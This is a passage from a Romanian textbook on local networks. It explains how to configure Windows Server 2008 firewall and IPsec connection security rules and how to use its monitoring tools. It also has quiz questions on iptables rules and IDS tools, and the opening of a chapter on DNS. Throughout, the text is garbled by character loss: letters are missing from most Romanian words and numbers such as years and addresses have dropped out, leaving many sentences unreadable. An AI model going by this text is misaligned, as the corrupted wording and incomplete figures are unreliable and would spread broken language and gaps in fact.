iptată, pe t u ele e iptate se o apli a alte eguli da ă e istă sau se o o fo a
o po ta e tului i pli it des is î p ofilul o e iu ii. Opţiu ea Override block rules spe ifi ă
faptul ă a eastă egulă a sup as ie o i e alte eguli a e a putea lo a o e iu ea î auză.
Opţiu ea este e esa ă pe t u a pe ite o o e iu e pe t u ă, î od o al, egulile de
lo a e au p io itate spo ită faţă de ele pe isi e.
 Programs and Services: “pe ifi ă e e uta ilul sau se i iul de siste pe t u a e se a apli a
egula. O i e p og a şi se i iu poate fi adăugat atâta ti p ât ulează p i p op iul său
e e uta il. Ate ţie la adăuga ea container-elor de servicii sau a progra elo a e găzduies
executabile, ca svchost.exe, dllhost,exe, inetinfo.exe pe t u ă pot ep eze ta is u i de
se u itate. ‘egulile a e se apli ă pe t u u a u it p og a sau se i iu pot fi folosite şi
pe t u a pe ite u o apli aţii să a epte o e iu i din Internet, atâta timp cât acestea
folosesc Windows Sockets (winsock) pentru a deschide propriile porturi.
 Users and computers: Pe ite spe ifi a ea ă o al ulatoa e sau utilizato i sau g upu i de
utilizatori) au dreptul de a se conecta la calculatorul local în contextul serviciului sau
p og a ului ă uia egula îi este aso iată. Opţiu ile legate de utilizato i şi al ulatoa e pot fi
utilizate doa da ă s-a spe ifi at a a ţiu e a egulii pe ite ea o e iu ilo da ă a estea su t
securizate. De aseme ea, o figu aţia este ala ilă doa pe t u eguli de tip inbound, iar
utilizato ii sau al ulatoa ele e se pot aute tifi a t e uie să fie a esi ile p i Active Directory
Domain Services.
1
Pe t u a easta t e uie să e iste şi o egulă o espu zătoa e de tipul Co e tio “e u it ‘ule.
236 | ‘ e ţ e l e L o a l e
 Protocols and ports: ‘egula poat fi pa ti ula izată î o ti ua e spe ifi â d po tu ile şi
p oto oalele TCP, UDP, G‘E, IP , L TP, et . e esa e pe t u o o e iu e p i a eastă egulă.
Pe t u ICMP su t dispo i ile opţiu i supli e ta e, î fu ţie de odu ile esajelo . De
ase e ea, filt a ea pe ază de po t se poate fa e atât pe t u po tu ile su să ât şi pe t u ele
desti aţie p op ii, î azul de faţă .
 Scope: “u t pe ise spe ifi a ea u o ad ese IP, i te ale de ad ese IP sau hia su eţele
î t egi de la a e su t a eptate o e iu ile. A eiaşi pa a et i pot fi o figu aţi şi pe t u
aşi a lo ală, az î a e egula se a apli a tutu o o e iu ilo di t e ad esele lo ale şi
ad esele de la dista ţă a e î depli es a ele ite ii o figu ate.
 Advanced: “e poate spe ifi a p ofilul pe t u a e egula este a ti ă toate sau numai unul
di t e ele t ei şi o e iu ea de eţea pe t u a e egula se apli ă.
6.4.1.3 Adăugarea de oi reguli

Windows Firewall permite crearea de noi reguli pentru a suplimenta cele implicite,
pa ti ula izate pe t u e esităţile fie ă ui siste sau eţea. Pe t u a ea o ouă egulă, se
sele tează atego ia de Inbound sau Outbound şi se fa e li pe New Rule î pa oul de a ţiu i.
1. Î p i a etapă se sele tează tipul egulii: Program, Port, Predefined sau Custom, după u au
fost p eze tate î se ţiu ea a te ioa ă. Pe t u a a ea a es la toate opţiu ile, pe t u
e e plul de faţă se a o side a ă se eează o egulă de tip Custom.
2. U ătoa ea pagi ă ofe ă t ei opţiu i:
o All programs: ‘egula a fi apli ată tutu o p og a elo ale ă o o e iu i se pot i es u setă ile
regulii.
o This program path: ‘egula se a apli a doa o e iu ilo i iţiate di sau sp e u a u it p og a
sele ta il p i e e uta ilul său.
o Services: Permite selectarea unui anumit serviciu din lista de servicii instalate în sistem, deoarece
1
majo itatea ulează găzduite î i te io ul alto e e uta ile, a services.exe sau
2
lsass.exe .
3. În continuare (figura 6-5 se poate alege p oto olul şi, e e tual, po tu ile pe t u a e egula a
fi apli ată. Da ă la pasul anterior s-a sele tat o apli aţie, u e e esa ă sele ta ea p oto olului
deoa e e Wi do s îl a ide tifi a di i te faţa winsock.
4. Î o ti ua e se pot spe ifi a ad esele IP, atât lo ale ât şi de la dista ţă pe a ă o o e iu i
se va aplica regula. Pot fi defi ite ad ese, i te alu i de ad ese sau su eţele. De ase e ea, se
pot alege ai i şi tipu ile o e iu ilo de tip eţea pe a e a fi apli ată egula.
5. A ţiu ea e poate fi apli ată î o e tul î a e egula firewall-ului i t ă î fu ţiu e, poate
să pe ită ealiza ea o e iu ii î o i e situaţie de i ea ea u ei eguli de tip Allow), doar în
azul î a e o e iu e este se u izată ai ulte detalii î se ţiu ea 6.4.1.2) sau poate bloca
realizarea conexiunii (crearea unei reguli de tip Deny).
6. Î u ătoa ea se ţiu e se pot ifa p ofilu ile pe t u a e egula să se apli e: Private, Public sau
Domain.
7. Î fi e, î ulti a etapă se dă u u e egulii şi, e e tual o des ie e a e ezu ă pa a et ii şi
a ţiu ile sale p efe a il şi s opul pe t u a e a fost eată egula .
8. Butonul Finish eează egula, e poate fi editată ulte io a şi o i e altă egulă i pli ită
o fo se ţiu ii 6.4.1.2).
1
Utilitar espo sa il u po i ea şi op i ea se i iilo , po i ea auto ată a lo la i iţializa ea siste ului si
oprirea lor la închiderea sa.
2
Utilita u ultiple espo sa ilităţi de se u itate, i luzâ d aute tifi a ea utilizato ilo . Ţi tă pe t u
u e oşi i uşi.
6-5: “pe ifi area porturilor şi proto olului pe tru regulă
6.4.1.4 Reguli de securizare a conexiunilor

Regulile de tip inbound şi outbound o t olează st i t flu u ile de date di t -un calculator.
Windows Firewall pe ite şi ea ea de reguli de securizare a conexiunilor (connection security
rules a e o t olează aute tifi a ea di t e două al ulatoa e două se e e di t -o eţea,
sp e e e plu pe t u a asigu a faptul ă o i e o e iu e sta ilită î t e a este al ulatoa e
este una se u izată, folosi d dife ite etode, p e u e tifi atele.
În Windows Firewall nu sunt reguli de securizare a conexiunilor configurate în mod
i pli it. Ele pot fi eate e pli it de ăt e ad i ist ato şi pot fi î pă ţite î u ătoa ele
categorii:
 Isolation: ‘egula est i ţio ează o e ta ea la u a u it al ulato de i îl „izolează pe aza
u o ite ii de aute tifi a e, p e u apa te e ţă la u do e iu sau a u o dife ite politi i de
securitate implementate.
 Authentication exemption: Regula poate permite a esul fă ă i fo aţii de aute tifi a e al
alto al ulatoa e la al ulato ul p op iu. A o da ea d eptului de o e ta e se fa e pe ază de
ad esă IP.
 Server to server: ‘egula este folosită pe t u a ealiza o o e iu e se u izată î t e două
servere. Este e oie de spe ifi a ea se e elo a e o fi i pli ate î o e iu e şi de
o figu a ea aute tifi ă ii e se do eşte a se ealiza î t e ele.
 Tunnel: ‘egulă pe t u o t olul pa a et ilo u ei o e iu i se u izate î t e două pu te,
peste o eţea pu li ă, ese u izată. “e spe ifi ă ele două pu te ale o e iu ii endpoints şi
metoda de autentificare.
 Custom: ‘egulă o plet o figu a ilă.
Pe t u a ea o astfel de egulă se sele tează Connection Security Rules di pa oul stâ g şi

se face clic pe link-ul New Rule di pa oul de a ţiu i, după a e se u ează etapele
u ătoa e:
238 | ‘ e ţ e l e L o a l e
1. Pe t u î eput, se alege tipul egulii e se do eşte a fi eată. Pe t u a a ea a es la toate

opţiu ile, pe t u e e plul de faţă se a alege tipul Custom.
2. U ătoa e opţiu e e e o figurarea capetelor conexiunii (endpoints). Endpoint-ul 1 poate fi
al ulato ul lo al sau o su eţea de ad ese IP e pot fi at i uite al ulato ului lo al, ia
endpoint-ul a fi ealălalt apăt al o e iu ii, spe ifi at p i t -o ad esă IP sau u i te al.
6-6: Definirea capetelor unei conexiuni securizate
3. Î pagi a u ătoa e se sele tează tipul de aute tifi a e e a fi folosită:

o Request authentication for inbound and outbound connections: Autentificarea nu este obligatorie,
dar este de preferat. Conexiunile inbound şi outbound ese u izate o euşi da da ă se do eşte
utiliza ea u ei aute tifi ă i se poate ealiza a est lu u.
o Require authentication for inbound connections and request authentication for oubound
connections: Co e iu ile i iţiate î e te io t e uie să fie aute tifi ate, da pe t u ele i iţiate lo al
este opţio al.
o Require authentication for inbound and outbound connections: Atât o e iu ile i iţiate di
e te io ât şi ele i iţiate lo al t ebuie autentificate, altfel regula va bloca realizarea lor.
o Do not authenticate: Nu este e esa ă aute tifi a ea.
4. Î u ătoa ea pagi ă se sele tează etoda de aute tifi a e folosită de egulă. Opţiu ea
Default foloseşte aute tifi a ea i pli ită a p ofilului. Se mai pot selecta metode de
aute tifi a e azate pe utilizato şi al ulato eea e e esită apa te e ţă la u do e iu ,
doa î fu ţie de al ulato , sau pe aza u ui e tifi at. P i opţiu ea Advanced se pot
spe ifi a două sesiu i de aute tifi ă i, se e ţiale, fie a e p i etodele sale.
5. Pe pagina Profile se aleg p ofilu ile pe t u a e egula a fi a ti ă.
6. Î ulti a pagi ă se i t odu e u u e şi o des ie e a p ofilului.
După ea e, egula apa e î lista de Connection Security Rules şi i se pot modifica

p op ietăţile a şi î azul egulilo Inbound sau Outbound.
6-7: Definirea metodelor de autentificare
6.4.1.5 Co figurări IP“e

IPSec (IP Security Protocol ep ezi tă o se ie de se i ii şi p oto oale de securitate
o ie tate sp e asigu a ea o fide ţialităţii datelo t a sfe ate î i te io ul u ei eţele sau p i
conexiuni de tip VPN. Avantajul major al IPSec este ă datele pot fi se u izate i dife e t da ă
dispoziti ele de pe pa u s supo tă sau u aceste protocoale. Criptarea în IPSec se face separat
pentru fiecare pachet iar ca metode de autentificare pot fi folosite certificatele digitale.
6-8: “etări IP“e

240 | ‘ e ţ e l e L o a l e
În Windows Server 2008, setă ile e ad esează IPSec sunt incluse în Windows Firewall şi
sunt accesibile la pagina IPSec Settings di ad ul fe est ei de p op ietăţi a firewall-ului.
Modifi a ea setă ilo i pli ite su t a esi ile p i apăsa ea uto ului Customize. Acestea vor
afecta toate regulile de tip Connection Security Rule definite în firewall.
Co figu ă ile pe t u IPSec se î ad ează î t ei atego ii: s hi ul de hei key exchange),
protejarea datelor (data protection şi odalitatea de aute tifi a e authentication method).
Pentru a schim a odul î a e se ealizează s hi ul de hei, se alege optiu ea
Advanced din grupul Key Exchange şi se fa e li pe uto ul Customize.
6-9: Opțiu i pe tru s hi ul de hei
6-10: Opțiu i pe tru prote ția datelor
Modul i pli it foloseşte algo it ul Diffie-Hellman Group 2 azat pe o heie pu li ă şi u a

p i ată . E istă posi ilitatea optă ii pe t u u algo it ai pute i , a Elliptic Curve Diffie-
Hellman P-384. T e uie a ut î ede e şi faptul ă sele ta ea a estui algo it i pu e

lie tului est i ţia a a esta să uleze el puţi Wi do s Vista iar serverul Windows Server
2008. Tot ai i poate fi odifi ată şi du ata de iaţă a heilo . Teo eti , se u itatea unei chei
este i e s p opo ţio ală u du ata sa de iaţă.
Tot di fe east a p i ipală a setă ilo IPSec poate fi odifi ată şi etoda folosită pe t u
asigu a ea se u ităţii datelo ipta e . Pe t u a easta se sele tează opţiu ea Advanced din
categoria Data protection (Quick Mode şi se apasă uto ul Customize.
I pli it se foloses doi algo it i pe t u a asigu a i teg itatea şi se u itatea datelo : E“P şi
AH. Protocolul Encapsulating Security Payload E“P ofe ă aute tifi a ea su sei datelo ,
integritate şi p ote ţie î pot i a ata u ilo de tip replay pe t u o ţi utul pa hetelo IP.
Protocolul Authentication Header AH ofe ă se u itate pe t u a tetul IP.
Ulti a atego ie de opţiu i se efe ă la etoda de aute tifi a e folosită pe t u a ealiza
conexiuni securizate:
 Computer and User (Using Kerberos V5) aute tifi ă atât al ulato ul ât şi utilizato ul.
Kerberos V5 foloseşte u siste de hei sau ti hete at i uite al ulatoa elo di do e iu.
Mesajele trimise de aceste calculatoare sunt autentificate p i ti het a e este ataşat î date.
 Computer (Using Kerberos V5) aute tifi ă doa al ulato ul.
 User (Using Kerberos V5) aute tifi ă doa utilizato ul.
 Computer certificate from this certification authority e esită spe ifi a ea u ui CA Certificate
Authority) iar autentificarea se face baza certificatelor digitale
6.4.2 Monitorizare
U aspe t i po ta t al ad i ist ă ii o i ă ei eţele îl ep ezi tă o ito iza ea se e elo
şi a t afi ului di eţea. Î Windows Server 2008, o ito iza ea pe fo a ţei se e ului este
ealizată de ăt e utilita ul Reliability and Performance Monitor. Pe de altă pa te, u alt
utilitar, Event Viewer, pe ite o ito iza ea ju alelo e ţi ute pe t u a ajuta la
ide tifi a ea p o le elo e pot apă ea î fu ţio a ea pe te e lu g a serverului.
6.4.2.1 Reliability and Performance Monitor

Reliability and Performance Monitor este un utilitar ce permite monitorizarea în timp real
a stă ii se e ului atât hardware ât şi pe pa tea de apli aţii. De ase e ea, el poate ea
apoa te de pe fo a ţă şi alerte pentru valori critice.
Î od i tuiti , pe fo a ţa performance des ie ât de epede se e ul e e ută
a u ite sa i i î ti p e sigu a ţa reliability este o ăsu ă a f e e ţei u a e se e ul
e e ută o sa i ă e a t aşa u a t e ui, o fo o figu aţiei sale. Reliability and
Performance Monitor ofe ă o ultitudi e de i fo aţii u p i i e la odul î a e atâţ
hardware-ul ât şi software-ul fu ţio ează i lusi siste ul de ope a e î si e . Î ge e al,
o ito iza ea pe fo a ţei a e a scop identificarea elementelor care încetinesc viteza
siste ului şi a oti elo pe t u a e a estea fu ţio ează posi il e o espu zăto . Pe de altă
pa te, situaţiile ep e ăzute sau e o t olate, u a fi dispoziti e a e u se i iţializează sau
se i iţializează i o e t, p e u şi se i ii op ite sau esta tate la o e te
e o espu zătoa e i t ă î atego ia e epţiilo de reliability.
Toate utilitarele de diagnostic oferite de Windows Server 2008 pot fi accesate prin Server
Manager, din categoria Diagnostics.
242 | ‘ e ţ e l e L o a l e
6-11: Reliability and Performance Monitor
Î pa tea supe ioa ă a Reliability and Performance Monitor su t afişate i fo aţii su a e

u p i i e la î ă a ea p o eso ului, dis ului, a e o iei şi a eţelei. Î pa tea i fe ioa ă,
fie a e esu să este detaliată după u u ează:
 CPU: “u t afişate o upa ea p o eso ului sau p o esoa elo p e u şi f e e ţa a i ă. De
ase e ea, utiliza ea sa este detaliată pe t u fie a e apli aţie î pa te, dupa PID, u e, u ă
de fi e de e e uţie di apli aţia espe ti ă, p o e tajul di p o eso folosit şi î ă a ea edie
de-a lungul timpului.
 Disk: Este afişat flu ul total de date la iti e/s ie e di se u da u e tă. “tatisti ile detaliate
pentru fiecare proces cu privire la utilizarea discului, cuprind: numele procesului, PID-ul său,
fişie ul u e t aflat î s ie e sau iti e, itezele u e te de iti e şi s ie e p io itatea
p o esului espe ti pe t u a es la dis şi aloa ea edie a ti pului de ăspu s al dis ului.
 Network: Este afişat t afi ul total p i i te feţele de eţea la o e tul u e t. Pe t u fie a e
p o es, ide tifi at p i u e şi PID su t detaliate: ad esa desti aţiei u a e apli aţia s hi ă
date la o e tul espe ti , datele t i ise şi p i ite şi lă gi ea de a dă totală utilizată.
 Memory: “e afişează glo al u ă ul de page faults1 pe se u dă şi p o e tajul de e o ie
utilizată la o e tul espe ti . Pe t u fie a e p o es î pa te, se ţi e e ide ţa: u ă ului de
hard faults-uri pe minut, a working set-ului, adi ă a a tităţii totale de e o ie folosita de
a ea i sta ţă a apli aţiei, e o ia pa taja ilă, a e poate fi a esată şi de ăt e alte apli aţii şi
e o ia p i ată.
Din cadrul Reliability and Performance Monitor, utilitarul Reliability Monitor ofe ă o
pe spe ti ă glo ală asup a e e i e telo di siste e au afe tat de-a lungul timpului
fu ţio a ea sa î t -un mod negativ.
1
U page fault ep ezi tă o situaţie î a e se a esează date di e o ia i tuală a u ui p o es da
a e u se găses î e o ia fizi ă şi t e uie aduse di fişie ul de pagi a e.
6.4.2.2 Performance Monitor

Performance Monitor ep ezi tă u utilita g afi pe t u ăsu a ea pe fo a ţei
siste ului şi a alto al ulatoa e di eţea. Performance Monitor s a ează pe fo a ţa
e hipa e telo fizi e, a p o eso ul, dis ul şi e o ia, fie a e ele e t e poate fi a alizat
fiind considerat un obiect.
U a u it pa a et u e este ăsu at pe t u u a u it o ie t este denumit un counter.
“p e e e plu, pe t u p o eso , pot fi ăsu ate counter-e a p o e tajul utilizat sau u ă ul
de î t e upe i pe se u dă. Performance Monitor poate afişa i fo aţiile su fo ă de g afi e,
î dife ite o figu aţii.
Adăuga ea u o oi counter-e se poate face fie din meniul contextual al graficului, fie prin
butonul Add de deasup a g afi ului. La adăuga ea u ui ou counter, se poate sele ta aşi a
p op ie sau o alta di eţea, esu sa a e a fi u ă ită şi pa a et ul spe ifi counter-ul)
co fo ă uia se a ealiza g afi ul.
6.4.2.3 Event Viewer

Fie a e i sta ţă a u ei a ţiu i e este e e utată î t -u siste este o side ată u
eveniment. Event Viewer, sp e deose i e de alte utilita e de o ito iza e, u ofe ă
i fo aţiile î ti p eal, i pe ite a esa ea şi i te p eta ea ju alelo î a e su t t e ute
de-a lu gul ti pului detalii desp e o e tul şi odul î a e a este e e i e te au a ut lo .
Event Viewer poate fi accesat tot din Server Manager, de la categoria Diagnostics. Event
Viewer încadrează ju alele î două atego ii: Windows Logs şi Application and Services Logs.
Jurnalele de tip Windows Logs i lud u ătoa ele:
 Application log: ju al e î egist ează e e i e tele di e selo apli aţii e ulează î siste .
De egulă a este e e i e te su t o t olate di odul apli aţiei. Tot ai i su t î ad ate şi
alertele definite în System Monitor.
 Security log: ju al e o ito izează e e i e tele legate de d eptu ile de a esa e a fişie elo ,
de aute tifi a ea utilizato ilo , de apa te e ţa la u domeniu, etc.
 Setup log: ju al o stituit di e e i e tele de la i stala ea şi o figu a ea apli aţiilo . De
ase e ea, e e i e tele legate de adăuga ea sau eli i a ea u o olu i ale se e ului,
p e u şi e e tualele e o i sau a e tis e te di ti pul a estora sunt înscrise aici.
 System log: ju al e ţi e e ide ţa a u ito e e i e te p edefi ite î Wi do s, u su t
ele legate de i stala ea sau fu ţio a ea i o e tă a d i e elo şi tot eea e ţi e de se i ii şi
pe fo a ţa siste ului.
Cealaltă atego ie de jurnale, Application and Services Logs, păst ează i fo aţii
pa ti ula e pe t u apli aţii şi o po e te ale se e ului. A este ju ale i lud e e i e te de
tipul Hardware Events i stală i, e o i , Internet Explorer Events şi Key Management Services
(e e i e te legate de folosi ea heilo pe t u ipta ea i fo aţiile t i ise sau p i ite di
eţea .
Pe t u î t eţi e e, ju alele pot fi golite pe iodi sau sal ate î fişie e pe dis î dife ite
formate.
244 | ‘ e ţ e l e L o a l e
Î tre ări
1. Care dintre rotocoalele de mai jos permite u t a sfe sigu de fişie e?
 SSH-1
 TFTP
 SCP
 Telnet
2. Care din echipamentele de mai jos pot fi folosite pentru a contracara atacuri?
 firewall-urile
 IDS-urile
 concentratoarele VPN
 atât IDS-u ile ât şi fi e all-urile
3. Care din protocoalele de mai jos nu are nevoie de inspectare a traficului pentru a
fu ţio a p i t -un firewall?
 FTP
 IRC
 WWW
 SQL
4. De e u a e se s u ătoa ea egulă?
iptables –A INPUT --mac-source 01:01:01:01:01:01 –j REJECT
 sele ta ea după ad ese MAC u se poate fa e pe la ţul INPUT

 regula are sens
 ad esa MAC este i o e tă
 nu se poate folosi REJECT cu adrese MAC
5. Ce efe t a e u ătoa ea egulă?

iptables –A INPUT –p icmp –icmp-type echo-request –s 192.168.1.0/24 –m limit 3/s –j ACCEPT
 egula este i o e tă si ta ti
 se primesc pachete ICMP de tip echo- e uest de la . . . / , da la o ată de pe
se u dă
 se primesc pachete ICMP de tip echo-request de la 192.168.1.0/24 dar se scriu în log
doa pe se u dă
 nu se primesc pachete ICMP de tip echo- e uest de la . . . / şi se s iu în log
doa pe se u dă
6. Care din următoarele utilitare pot fi folosite ca şi IDS-uri

 Snort
 Wireshark
 Iptables
 nat
245 | D N S
7 DNS
You k o it’s lo e he ou e o ize he IP add ess to skip DN“ o e head
Ce se î vaţă di acest capitol?

 Ce sunt domeniile de nume
 Ce sunt serverele DNS
 Configurarea serviciului DNS pentru clienti
 Configurarea BIND
 Configurarea rolului de server DNS pe Windows
Cine este...
Paul Mockapetris este inventatorul DNS. Mockapetris a lucrat ca manager de program
la di e se o pa ii de eţelisti ă și I te et. Di , a ti ează la I stitutul de Știi ţe
Informatice (ISI) de la Universitatea din California de Sud.
Paul Vixie este auto ul u ui u ă i po ta t de RFC-u i și utilita e sta da d UNIX. A
fost eato ul se e ului DN“ i d și a hite tul a estuia pâ ă la e siu ea . Ope ează
se e ul ădă i ă L di DN“.
7.1 Protocolul DNS

Pentru a facilita a esa ea esu selo i I te et este e esa ă e iste ţa u ei aso ie i î t e
ad esa IP a a esto a şi u u e uşo de eţi ut. Asta deoa e e este i posi il a i e a să
poată eţi e toate ad esele IP folosite pe glo . La î eputul I te etului staţiile e au a esate
pe aza i t ă ilo di fişie ul /etc/hosts a e fă eau translatarea adreselor din formatul
preferat de utilizatorul uman (ex: www.wikipedia.org) în adrese IP necesare echipamentelor
de eţea.
O dată u eşte ea e plozi ă a di e siu ii I te etului, a de e it e ide t ă e a e oie
de o soluţie a e să ezol e p o le ele de s ala ilitate. “oluţia pe t u a este p o le e a fost
dezvoltarea unui nou protocol, Domain Name Server (DNS). Protocolul a fost dezvoltat în anii
, p opus a ‘FC şi adoptat apoi a sta da d I te et. Deşi p oto olul a e peste de a i
e hi e, e istă şi î u ătăţi i şi fa ilităţi oi aduse se i iului de u e e te sii de securitate,
stocarea certificatelor digitale în DNS, etc.).
DN“ este î ese ţă o ază de date distri uită a e aso iază dife ite i fo atii u
domeniile DNS. Noutatea pe care o aducea DNS la vremea propunerii sale ca standard nu era
atât o eptul de ază de date dist i uită - î se sul î a e i fo aţiile di aza de date su t
păst ate pe staţii dife ite - i ai deg a ă faptul ă şi ad i istrarea azei de date ur a să se
fa ă distri uit.
7.1.1 Domenii DNS

Un domeniu DNS este o g upa e a ai ulte staţii şi se ere ce au un sistem de
ad i ist a e o u şi su t ide tifi ate de u u e u i .
Î t e do e ii e istă o legătu ă ie a hi ă. Î ge e al, u do e iu a e î o po e ţă alte
su do e ii şi fa e pa te di t -un alt domeniu la rândul lui (care ar putea fi numit
suprado e iu, deşi te e ul u este folosit î lite atu a de spe ialitate . A eastă elaţie
ie a hi ă de i luziu e poate fi el ai si plu e pli ată p i t-un exemplu concret: subdomenii
pentru domeniul pub.ro sunt cs.pub.ro, electronica.pub.ro sau acs.pub.ro, iar
supradomeniul pentru pub.ro este ro. Deşi î t e do e ii e istă a eastă elaţie de i luziu e,
246 | ‘ e ţ e l e L o a l e
t e uie eţi ut faptul ă su do e iile u t e uie să ai ă fie a e a elaşi ad i ist ato a şi

do e iul di a e fa pa te. După u s-a mai spus, noutatea DN“ o stă î posi ilitatea
ad i ist ă ii azei de date î od dist i uit şi di a eastă auză, î ge e al, do e iile au
delegate pentru un subdomeniu un nou administrator.
Dato ită st u tu ii sale ie a hi e, aza de date DN“ poate fi izualizată a u a o e
ulti ăi, î a e odu ile su t do e ii. De e e plu, pe t u do e iile e u e ate î
pa ag aful p e ede t, a o ele aso iat este p eze tat î figu ă.
ro … net com
pub …
roedu netacad
cs acs
7-1: Ierarhia DNS
După u se o se ă î figu ă, fie a e od, ai puţi odul ădă i ă, a e aso iat u u e

p e u o, a s, pu , o. A eastă odalitate de u i e, î a e u se spe ifi ă u ele o plet
al do e iului este u ită referire relati ă (relative domain name . Da ă se deţi e doar
numele relativ al unui domeniu, numele complet al domeniului (fully qualified domain name -
FQDN) poate fi aflat prin concatenarea numelor supradomeniilor aflate în drumul de la
do e iu la ădă i ă şi folosi ea pu tului a sepa ato î t e u ele do eniilor.
7.1.1.1 Domenii speciale

P i ipalul ol al se i iului de u e este de a aso ia u e staţiilo di I te et, a e altfel
a fi fost ide tifi ate de ad ese IP. A easta î sea ă ă se i iul DN“ a t e ui să ofe e
utilizato ilo el puţi două ope aţii: rezol are dire tă (resolve lookup) - aflarea adresei IP
atu i â d şti u ele staţiei şi rezol are i ersă (reverse lookup) - aflarea numelui unei
staţii atu i â d şti ad esa IP.
Ierarhia DNS începe cu câteva domenii speciale, denumite TLD (top level domains).
com - do e ii folosite de o ga izaţiile o e iale

edu - do e ii folosite de o ga izaţiile edu aţio ale
gov - do e ii folosite o ga izaţiile gu e a e tale
mil - do e ii folosite o ga izaţiile ilita e
org - do e ii folosite o ga izaţiile on-profit
net - domenii ale o ga izaţiilo e ad i ist ează eţele ai
ro, fr, eu, us - do e ii de ţa ă
A este do e ii su t ad i ist ate de ăt e ICANN Internet Corporation For Assigned

Names and Numbers). Ele sunt subdomenii ale unui domeniu generic, fă ă u e, a e este
ădă i a ie a hiei. Toate do e iile di I te et su t pâ ă la u ă su do e ii ale a esto
domenii din vârful ierarhiei. Înregistrarea unui subdomeniu .eu ostă ap o i ati eu o pe
247 | D N S
an, iar un subdomeniu .ro ostă e a ai ult de 0 USD + TVA (19%), dar este înregistrat pe
iaţă. De la ia ua ie , pe soa ele fizi e şi ju idi e di ‘o a ia pot t i ite e e i pe t u
înregistrarea de domenii .eu. Pot i it EU‘id Eu opea ‘egist fo I te et Do ai s , pâ ă la
data de 20 septembrie 2007, România „a contribuit" cu 11,851 de nume de domenii .eu
a ti e. Co pa ati , lo uito ii Ge a iei deţi 822,712 de domenii .eu, iar cei ai Republicii
Cehe deţi , de do e ii.
După u s-a p e izat ai sus, p oto olul DN“ ofe ă şi posi ilitatea de reverse-lookup.
A eastă fa ilitate este folosită de utilita e de troubleshooting precum traceroute sau
ping.Pe t u a păst a o o siste ţă î fu ţio a e, şi t adu e ea i e să se fa e tot u ajuto ul
u ui do e iu, a e poa tă u ele de in-addr.arpa. El nu este un top-level domain şi a fost
eat pe t u a pe ite ezol a e i e să, di ad ese IP î u e.
A esta o ţi e su do e ii a e o espu d u o teţii di t -o ad esă IP, î o di e i e să.
De exemplu, pentru adresa 141.85.37.1, cererea pentru traducerea i e să se a fa e pe t u
1.37.85.141.in-addr.arpa. Î aza de date DN“ a estei i t ă i îi o espu de u ele staţiei.
7.1.1.2 Cereri DNS

S-a sta ilit de i e oia pe t u p oto olul DN“ şi st u tu a ie a hiei a estuia. Ce se î tâ plă
î să î o e tul efe tuă ii u ei e e i DN“? Cel ai adesea o e e e a fi efe tuată de ăt e
un browser web la introducerea unei adrese URL, ca www.google.com. Clientul web va trebui
să afişeze o ţi utul pagi ii a e se află pe se e ul HTTP efe it de a est u e. Pe t u a
putea face acest lucru, trebuie trimis un mesaj HTTP de tip GET. Ca o i e pa het e u ează să
fie t i is î I te et, şi u esaj HTTP a t e ui să o ţi ă î a te tul de i el , o ad esă IP
desti aţie. Ai i i te i e lie tul de DN“ i teg at î browser) care face o cerere DNS pentru a
putea afla ad esa IP a se e ul HTTP a e se eşte pagi ile pe t u do e iul www.google.com.
Ce e ea a fi fă ută ăt e se e ul spe ifi at pe staţie, a fii d se e ul lo al de DN“. Pe u
sistem Linux acest server este specificat î fişie ul /etc/resolv.conf. Bi eî ţeles ă se e ul
DNS local s-a putea să u u oas ă ad esa IP pe t u www.google.com, ă i după u s-a
spe ifi at a te io , aza de date DN“ este dist i uită şi ad i ist ată dist ibuit.
Ce e ile t i ise de lie ţii DN“, se e elo lo ale poa tă o de u i e spe ială î
te i ologia DN“, şi a u e cereri recursive. A eastă de u i e este dată de faptul ă se e ul
DN“ lo al este o ligat să ezol e e e ea i dife e t da ă a e i fo aţii desp e ea sau u, p i
interograrea altor servere DNS.
Pe t u a putea si plifi a p oto olul, doa lie ţii de DN“ pot fa e e e i e u si e. Da ă
serverul local u ştie sa ăspu dă u o ad esă IP pentru un anumit domeniu, el va face o cerere
ere ursi ă la un alt server DNS remote a eastă ope aţie se a detalia î u ăto ul
su apitol . Ce e ea este u ită e e u si ă di auza faptului ă da ă se e ul remote
i te ogat u poate ezol a u ele de do e iu, a esta a ofe i u ăspu s egati fă ă a ai
î e a el să î t e e alt se e de u e alătu i de u hint a e să i di e u alt se e DN“ a e
a putea să t adu ă u ele. Î o ti ua e, se e ul DN“ lo al, deşi a p i it u ăspu s
negativ, deoarece a primit anterior o cerere re ursi ă, a o ti ua să î t e e alte se e e DN“
remote, pâ ă a p i i u ăspu s poziti pe a e îl a etu a lie tului.
Pe t u a o luzio a, dife e ţa di t e o e e e e u si ă şi u a e e u si ă, este ă p i a
di t e a estea a fi î totdeau a ezol ată, pe â d a doua, u poate p i i ăspu s egati .
7.1.2 Tipuri de servere DNS

S-a putut o se a ă fie a e domeniu DN“ a e o e titate ad i ist ati ă. A eastă e titate
ad i ist ati ă este un server DNS sau, conform terminologiei DNS, un server de nume.
248 | ‘ e ţ e l e L o a l e
P i ipalul ol al se e ului de u e aso iat u ui do e iu este de a ăspunde la cereri despre

staţiile şi se e ele aflate î gestiu ea sau auto itatea sa.
“e spu e ă u se e de u e este server autoritar pentru o intrare din baza de date DNS
da ă i t a ea fa e pa te di do e iul gestio at de se e ul de u e.
Ate ţie! Faptul ă un server este autoritar pe domeniul cs.pub.ro, u î sea ă ă el u

a î e a să ezol e o e e e e u si ă pe t u ad esa ubuntuforums.org, i doa faptul ă
adresa cs.pub.ro a putea fi t adusă î totdeau a di e t de ăt e el.
După u se a edea în continuare, rezolvarea unui domeniu, a unui nume sau a unei
ad ese este u p o es ite ati e poate e esita i te oga ea ai ulto se e e DN“, şi a e,
de i, o late ţă o side a ilă. Di a eastă auză, î ge e al, se e ele de DN“ o ăspu de şi la
e e i a e u i t ă î auto itatea lo u fa pa te di do e iul gestio at , di două oti e:
a est lu u a si plifi a i ple e ta ea lie tului de DN“ şi î a elaşi ti p se a putea folosi
un cache pe t u toate staţiile e foloses a el se e de u e. Astfel, clientul va trimite
e e ea DN“ se e ului i dife e t da ă e e ea se efe ă la u u e di do e iul se e ului
sau u; a esta a ezol a e e ea fie lo al, da ă u ele fa e pa te di do e iul său, fie p i
i te oga ea ite ati ă a ai ulto se e e de u e, după u u ează. Odată aflat ăspu sul
a esta a putea fi păst at î cache, şi e e ile ulte ioa e o fi se ite di cache.
Dato ită cache-ului se poate î tâ pla a odifi ă ile ope ate de se e ul de u e asup a
po ţiu ii sale di aza de date DN“ să u fie izi ile i ediat. A easta dato ită faptului ă alte
